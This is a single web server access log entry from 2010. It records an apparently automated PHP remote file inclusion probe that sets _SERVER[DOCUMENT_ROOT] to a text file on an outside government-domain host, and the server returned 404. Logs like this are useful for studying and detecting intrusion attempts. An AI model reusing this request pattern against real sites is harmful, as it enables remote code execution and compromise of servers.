87.106.65.116 - - [04/Mar/2010:07:25:44 -0800] "GET /logs/access_100218.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.miranda.gov.ve/modules/mod_sections/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
